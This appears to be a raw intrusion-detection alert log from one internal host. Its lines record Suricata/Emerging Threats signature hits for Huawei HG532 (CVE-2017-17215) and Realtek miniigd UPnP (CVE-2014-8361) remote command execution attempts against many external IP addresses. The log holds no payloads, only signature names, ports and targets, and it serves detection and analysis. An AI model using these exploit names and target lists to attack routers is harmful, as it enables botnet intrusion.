                                                07/20/24-23:05:48.841499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315037215192.168.2.14216.16.161.149
                                                07/20/24-23:05:37.487250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4735452869192.168.2.14131.178.64.107
                                                07/20/24-23:05:35.450834TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616049052869192.168.2.14188.199.48.64
                                                07/20/24-23:06:31.088639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5741452869192.168.2.144.205.240.59
                                                07/20/24-23:05:38.713445TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614627652869192.168.2.1459.16.3.2
                                                07/20/24-23:05:48.780090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740837215192.168.2.1441.13.83.167
                                                07/20/24-23:05:57.960840TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613841052869192.168.2.14204.53.157.110
                                                07/20/24-23:06:00.469923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5350252869192.168.2.1442.150.243.146
                                                07/20/24-23:05:45.826893TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3742652869192.168.2.14202.78.132.130
                                                07/20/24-23:05:39.408822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5426252869192.168.2.14193.25.57.29
                                                07/20/24-23:05:56.400670TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613969452869192.168.2.14201.191.195.148
                                                07/20/24-23:05:38.513646TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614865252869192.168.2.14200.65.225.77
                                                07/20/24-23:05:37.497165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5771652869192.168.2.14218.175.31.238
                                                07/20/24-23:05:47.447079TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4526252869192.168.2.14114.223.237.120
                                                07/20/24-23:06:10.391415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4932652869192.168.2.142.225.107.63
                                                07/20/24-23:06:15.435068TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615139252869192.168.2.14140.27.159.140
                                                07/20/24-23:05:36.072925TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614632252869192.168.2.1434.247.156.202
                                                07/20/24-23:05:52.589589TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25391252869192.168.2.1449.158.117.14
                                                07/20/24-23:05:33.830272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3594837215192.168.2.14157.153.42.4
                                                07/20/24-23:05:56.454514TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614197652869192.168.2.1490.200.1.246
                                                07/20/24-23:05:48.783693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507237215192.168.2.14197.16.244.151
                                                07/20/24-23:06:07.419849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701437215192.168.2.14197.226.210.20
                                                07/20/24-23:05:40.338978TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24096052869192.168.2.14217.104.148.40
                                                07/20/24-23:05:58.361554TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24161252869192.168.2.1460.229.99.124
                                                07/20/24-23:05:36.328888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299037215192.168.2.14197.156.215.136
                                                07/20/24-23:06:02.867753TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613989052869192.168.2.14147.147.61.107
                                                07/20/24-23:05:37.458829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25840852869192.168.2.14102.124.228.209
                                                07/20/24-23:05:40.435340TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25216852869192.168.2.14223.83.31.67
                                                07/20/24-23:05:47.103906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050037215192.168.2.14197.58.127.106
                                                07/20/24-23:05:47.464031TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613898252869192.168.2.1475.169.253.25
                                                07/20/24-23:05:56.900578TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614967452869192.168.2.1458.74.85.108
                                                07/20/24-23:06:03.841638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5769652869192.168.2.14145.15.157.98
                                                07/20/24-23:05:33.863826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039637215192.168.2.14174.135.199.129
                                                07/20/24-23:06:02.405141TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613349652869192.168.2.1412.222.33.202
                                                07/20/24-23:05:58.898489TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615015852869192.168.2.1490.96.121.212
                                                07/20/24-23:05:47.716986TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5723452869192.168.2.1434.93.140.173
                                                07/20/24-23:05:47.464031TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613653852869192.168.2.14161.253.139.174
                                                07/20/24-23:05:44.688793TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25154052869192.168.2.14185.227.212.222
                                                07/20/24-23:05:47.375806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615933452869192.168.2.1445.52.160.244
                                                07/20/24-23:06:00.746218TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5285252869192.168.2.1491.100.67.165
                                                07/20/24-23:06:19.930679TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614938052869192.168.2.1470.112.34.196
                                                07/20/24-23:06:01.994638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6058852869192.168.2.14173.164.101.22
                                                07/20/24-23:05:36.325773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881637215192.168.2.1441.127.89.65
                                                07/20/24-23:06:01.613195TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4431852869192.168.2.1471.105.97.148
                                                07/20/24-23:05:46.143329TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613293252869192.168.2.1496.201.129.138
                                                07/20/24-23:06:00.768266TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24852852869192.168.2.1425.197.167.180
                                                07/20/24-23:05:56.127169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3830637215192.168.2.14197.69.89.50
                                                07/20/24-23:05:42.245949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137837215192.168.2.14197.255.225.75
                                                07/20/24-23:06:01.851987TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614377652869192.168.2.1439.96.83.57
                                                07/20/24-23:05:52.504672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25971252869192.168.2.1434.65.144.238
                                                07/20/24-23:06:02.071790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3455852869192.168.2.14153.103.17.36
                                                07/20/24-23:06:10.935593TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24228852869192.168.2.14151.48.203.94
                                                07/20/24-23:05:44.984925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3820652869192.168.2.1489.176.48.222
                                                07/20/24-23:05:38.070646TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5287252869192.168.2.14116.197.2.184
                                                07/20/24-23:05:45.374653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032437215192.168.2.14114.53.139.106
                                                07/20/24-23:05:57.144593TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3867252869192.168.2.1498.96.42.253
                                                07/20/24-23:05:35.384826TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614114852869192.168.2.14107.226.165.86
                                                07/20/24-23:05:36.592874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447237215192.168.2.14191.91.41.96
                                                07/20/24-23:07:08.490661TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24092852869192.168.2.14155.40.210.136
                                                07/20/24-23:05:59.198584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3555252869192.168.2.1461.154.240.237
                                                07/20/24-23:05:47.470061TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4493852869192.168.2.1483.112.33.152
                                                07/20/24-23:05:52.508652TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5474452869192.168.2.14212.222.66.158
                                                07/20/24-23:06:17.555463TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4098452869192.168.2.1480.124.106.135
                                                07/20/24-23:06:01.997543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3656052869192.168.2.14201.78.138.208
                                                07/20/24-23:05:57.188540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5447652869192.168.2.1414.148.136.80
                                                07/20/24-23:06:16.652415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3589252869192.168.2.14207.245.156.40
                                                07/20/24-23:05:52.494675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4961652869192.168.2.1420.92.193.38
                                                07/20/24-23:06:11.328788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4464052869192.168.2.14210.105.148.37
                                                07/20/24-23:06:18.534266TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3919052869192.168.2.1460.241.94.226
                                                07/20/24-23:05:57.507455TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613411852869192.168.2.14165.228.62.149
                                                07/20/24-23:06:08.698381TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614142852869192.168.2.1457.168.132.3
                                                07/20/24-23:06:00.561304TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613320452869192.168.2.14140.82.127.22
                                                07/20/24-23:06:24.304142TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614248452869192.168.2.1412.108.63.195
                                                07/20/24-23:05:33.829338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5127237215192.168.2.14157.194.67.142
                                                07/20/24-23:05:57.648686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615601252869192.168.2.14192.161.140.181
                                                07/20/24-23:05:44.364114TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25524652869192.168.2.14198.53.78.79
                                                07/20/24-23:05:38.945198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3386237215192.168.2.14157.23.244.45
                                                07/20/24-23:05:59.102064TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613384652869192.168.2.1425.34.210.225
                                                07/20/24-23:05:37.443569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3428052869192.168.2.1459.35.79.156
                                                07/20/24-23:06:03.014485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5632852869192.168.2.14216.254.35.160
                                                07/20/24-23:05:36.354373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452237215192.168.2.1441.148.228.193
                                                07/20/24-23:06:01.207184TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25960252869192.168.2.1458.37.104.40
                                                07/20/24-23:05:37.453622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24921252869192.168.2.1437.154.117.198
                                                07/20/24-23:05:57.233976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614667652869192.168.2.141.64.96.57
                                                07/20/24-23:05:37.963175TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614442252869192.168.2.14125.180.243.83
                                                07/20/24-23:06:00.592911TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613637452869192.168.2.14109.194.35.126
                                                07/20/24-23:05:57.229188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4440452869192.168.2.1443.139.9.185
                                                07/20/24-23:05:52.603344TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5221052869192.168.2.14207.158.17.11
                                                07/20/24-23:05:46.119639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864237215192.168.2.14157.243.128.36
                                                07/20/24-23:06:14.413410TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613609852869192.168.2.1412.103.243.28
                                                07/20/24-23:05:40.440618TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26011452869192.168.2.1474.254.17.92
                                                07/20/24-23:05:46.414364TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5977052869192.168.2.1479.31.170.172
                                                07/20/24-23:06:12.460952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6031852869192.168.2.14144.88.71.215
                                                07/20/24-23:06:03.394385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3906252869192.168.2.14203.174.131.227
                                                07/20/24-23:05:48.763323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925637215192.168.2.14197.252.142.164
                                                07/20/24-23:05:56.038244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688037215192.168.2.14181.18.68.226
                                                07/20/24-23:06:00.470172TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5000452869192.168.2.1447.131.236.250
                                                07/20/24-23:06:12.532321TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24079252869192.168.2.14104.173.87.251
                                                07/20/24-23:05:36.354373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511237215192.168.2.14157.130.50.76
                                                07/20/24-23:05:39.559457TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615566452869192.168.2.1434.80.28.184
                                                07/20/24-23:05:37.517011TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26030652869192.168.2.1493.244.188.64
                                                07/20/24-23:06:08.078658TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25347652869192.168.2.14130.32.183.138
                                                07/20/24-23:05:35.475871TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5947852869192.168.2.1424.245.120.74
                                                07/20/24-23:05:40.435340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4852052869192.168.2.14163.35.26.213
                                                07/20/24-23:06:00.649436TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5803252869192.168.2.14218.181.218.187
                                                07/20/24-23:06:29.180793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5298852869192.168.2.14140.134.248.178
                                                07/20/24-23:05:48.858199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491837215192.168.2.14221.110.118.206
                                                07/20/24-23:06:08.051467TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5267252869192.168.2.14137.249.151.1
                                                07/20/24-23:06:26.043403TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614636052869192.168.2.14208.46.25.166
                                                07/20/24-23:05:38.762457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5067252869192.168.2.1450.94.4.19
                                                07/20/24-23:05:52.551649TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24372652869192.168.2.14143.164.138.163
                                                07/20/24-23:05:59.845937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4939252869192.168.2.14125.143.14.140
                                                07/20/24-23:05:59.139794TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615815052869192.168.2.1431.110.108.63
                                                07/20/24-23:05:48.748554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4766437215192.168.2.14197.243.41.83
                                                07/20/24-23:06:50.079146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5491652869192.168.2.1448.215.144.137
                                                07/20/24-23:05:57.149453TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5538852869192.168.2.14148.242.100.157
                                                07/20/24-23:07:06.736138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4012052869192.168.2.1485.57.174.44
                                                07/20/24-23:05:37.444466TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23298052869192.168.2.1419.97.179.204
                                                07/20/24-23:05:40.426800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5622852869192.168.2.1497.71.44.240
                                                07/20/24-23:06:35.442399TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6067452869192.168.2.14179.170.99.171
                                                07/20/24-23:05:57.166360TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5468652869192.168.2.14137.7.11.114
                                                07/20/24-23:06:29.188292TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3643052869192.168.2.14131.71.38.140
                                                07/20/24-23:06:20.610603TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24838052869192.168.2.14137.15.168.190
                                                07/20/24-23:05:38.223936TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4582252869192.168.2.1489.172.236.176
                                                07/20/24-23:06:02.872548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5770452869192.168.2.14160.143.127.233
                                                07/20/24-23:06:27.749158TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5591652869192.168.2.1485.22.107.102
                                                07/20/24-23:05:56.022964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015637215192.168.2.1441.163.78.59
                                                07/20/24-23:05:58.195412TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4429652869192.168.2.14138.215.99.180
                                                07/20/24-23:06:56.433850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4062052869192.168.2.14153.186.8.251
                                                07/20/24-23:05:33.855567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415837215192.168.2.14197.237.152.228
                                                07/20/24-23:05:46.707199TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5709652869192.168.2.14132.1.16.35
                                                07/20/24-23:05:59.046185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3524452869192.168.2.1412.220.195.141
                                                07/20/24-23:05:59.128245TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4804052869192.168.2.1484.100.131.64
                                                07/20/24-23:05:37.441224TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25774052869192.168.2.1462.5.163.114
                                                07/20/24-23:05:59.482880TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5812252869192.168.2.14202.241.41.21
                                                07/20/24-23:05:47.415063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5277452869192.168.2.14212.222.66.158
                                                07/20/24-23:06:16.651508TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3350252869192.168.2.1471.86.175.101
                                                07/20/24-23:06:10.357307TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24083452869192.168.2.1444.212.106.74
                                                07/20/24-23:05:35.760150TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614862652869192.168.2.14198.22.21.63
                                                07/20/24-23:05:57.526744TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24892652869192.168.2.14140.124.136.34
                                                07/20/24-23:06:16.855430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5026252869192.168.2.14210.70.160.242
                                                07/20/24-23:05:48.107529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4192452869192.168.2.14110.239.167.97
                                                07/20/24-23:06:12.761892TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3523052869192.168.2.1449.163.219.249
                                                07/20/24-23:05:59.324002TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614616452869192.168.2.1432.94.211.34
                                                07/20/24-23:05:52.485640TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24642252869192.168.2.1442.117.19.18
                                                07/20/24-23:05:34.648426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692637215192.168.2.14197.1.185.169
                                                07/20/24-23:05:48.780090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3973437215192.168.2.14157.228.254.220
                                                07/20/24-23:06:02.405141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5435452869192.168.2.14145.209.73.208
                                                07/20/24-23:06:33.411817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3597652869192.168.2.14169.178.252.2
                                                07/20/24-23:06:21.746493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614719052869192.168.2.1465.122.250.47
                                                07/20/24-23:05:52.728680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4570252869192.168.2.1413.6.44.150
                                                07/20/24-23:05:35.460621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5163652869192.168.2.1464.61.239.79
                                                07/20/24-23:06:31.773037TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614558452869192.168.2.14119.170.177.102
                                                07/20/24-23:05:37.454427TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25546652869192.168.2.14121.248.9.74
                                                07/20/24-23:06:15.110617TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5007252869192.168.2.14198.64.2.133
                                                07/20/24-23:06:22.097094TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4406452869192.168.2.14213.131.142.92
                                                07/20/24-23:06:06.112950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3952052869192.168.2.1437.219.135.4
                                                07/20/24-23:05:39.771399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890037215192.168.2.14141.199.46.45
                                                07/20/24-23:06:17.501695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3964252869192.168.2.14216.88.74.6
                                                07/20/24-23:06:17.337182TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4137452869192.168.2.14198.203.207.18
                                                07/20/24-23:05:35.901932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4928052869192.168.2.1458.236.61.29
                                                07/20/24-23:05:57.625091TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615374452869192.168.2.14131.196.248.38
                                                07/20/24-23:05:57.787088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085652869192.168.2.14169.123.145.142
                                                07/20/24-23:05:36.323663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854437215192.168.2.1441.142.9.121
                                                07/20/24-23:05:57.139895TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614789452869192.168.2.14164.70.124.204
                                                07/20/24-23:06:20.550859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3960852869192.168.2.1490.186.107.209
                                                07/20/24-23:07:32.121311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3892252869192.168.2.14186.153.223.147
                                                07/20/24-23:07:04.345966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3913452869192.168.2.14192.34.4.75
                                                07/20/24-23:06:32.540944TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615027252869192.168.2.14222.225.200.134
                                                07/20/24-23:06:56.793781TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24676252869192.168.2.14134.166.44.252
                                                07/20/24-23:05:42.257816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809837215192.168.2.14119.42.235.35
                                                07/20/24-23:06:00.198211TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3423852869192.168.2.14186.25.143.158
                                                07/20/24-23:05:52.508652TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24098052869192.168.2.1475.169.253.25
                                                07/20/24-23:06:10.556359TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615622052869192.168.2.1476.6.203.77
                                                07/20/24-23:06:54.322182TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616038652869192.168.2.14128.90.178.16
